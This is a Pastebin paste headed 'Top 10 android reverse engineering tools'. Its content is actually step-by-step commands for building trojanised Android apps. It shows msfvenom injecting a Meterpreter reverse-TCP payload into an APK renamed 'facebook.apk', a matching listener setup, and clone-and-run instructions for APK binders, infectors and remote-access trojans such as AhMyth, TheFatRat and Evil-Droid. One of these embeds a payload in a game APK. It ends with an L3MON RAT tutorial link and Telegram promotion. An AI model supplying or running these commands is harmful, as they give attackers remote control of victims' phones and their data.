Advertisement
efxtv

Top 10 android reverse engineering tools

Sep 7th, 2022
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.34 KB | Cybersecurity | 0 0
  1. Top 10 android reverse engineering tools
  2.  
  3. # Prerequisite
  4. APKsigner or Jarsigner [One of them]
  5. APK Tool [Latest]
  6. ZipAlign
  7. keytool
  8. jarsigner
  9. java8
  10. wine32
  11. python3
  12. metasploit
  13. and more
  14.  
  15. #1 Metasploit
  16. msfvenom -x Yourapp.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o facebook.apk
  17.  
  18. # Listen to meterpreter sessions
  19. msfconsole
  20. use exploit/multi/handler
  21. set payload android/meterpreter/reverse_tcp
  22. set lhost 192.168.1.10
  23. set lport 4444
  24. run
  25.  
  26. #2 APK Binder
  27. git clone https://github.com/kinghacker0/Apk-Binder
  28. cd Apk-Binder/
  29. bash apk-binder.sh
  30.  
  31. #3 Embed
  32. git clone https://github.com/ivam3/embed.git
  33. cd embed/
  34. bash set-apktool
  35. ruby EMBED.rb /root/Ludo_v2.21_apkpure.com.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444
  36.  
  37.  
  38. #4 Apkinfector
  39. git clone https://github.com/PushpenderIndia/apkinfector.git
  40. cd apkinfector/
  41. python3 infector.py
  42. python3 infector.py --lhost 192.168.1.10 --lport=4444 -n /root/Ludo_v2.21_apkpure.com.apk --apk-name Ludo
  43.  
  44. #5 TheFatRat
  45. git clone https://github.com/Screetsec/TheFatRat.git
  46. cd TheFatRat
  47. chmod +x setup.sh
  48. bash setup.sh
  49.  
  50. #6 Evil-Droid
  51. git clone https://github.com/M4sc3r4n0/Evil-Droid.git
  52. cd Evil-Droid
  53. chmod +x evil-droid
  54. bash evil-droid
  55.  
  56. #7 AhMyth Android Rat
  57. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
  58. cd AhMyth-Android-RAT/AhMyth-Server
  59. npm start
  60.  
  61. #8 EMSF Tool
  62. https://github.com/efxtv/EMSF
  63. curl -L -o $PWD/emsf https://github.com/efxtv/EMSF/blob/main/Linux/emsf?raw=true -s;sudo chmod +x emsf;sudo cp emsf /usr/bin/
  64.  
  65. #9 Metasploit-apk-embed-payload-using-Ruby
  66. git clone https://github.com/xc0d3rz/metasploit-apk-embed-payload.git
  67. gem install bundler
  68. bundler install
  69. ./run messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443
  70.  
  71. #10 Veil
  72. sudo apt-get -y install git
  73. git clone https://github.com/Veil-Framework/Veil.git
  74. cd Veil/
  75. ./config/setup.sh --force --silent
  76.  
  77. ---------------------------------------------------------------
  78.  
  79. How to install root in Termux, without having actual root
  80. https://youtube.com/playlist?list=PLI4Vi9cCSEQkuNBwBcSPxDEEkMZ25X8n9
  81.  
  82. How to install L3MON RAT in Termux/Kali Linux
  83. https://youtube.com/playlist?list=PLI4Vi9cCSEQkpGsWCx23ieY32ENrTTUnJ
  84.  
  85. Java 8 in Any operating System
  86.  
  87. Join our telegram group
  88. t.me/efxtv
  89.  
  90. Our Paid user Group
  91. https://t.me/+EUnfbhWXqjszNTc9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement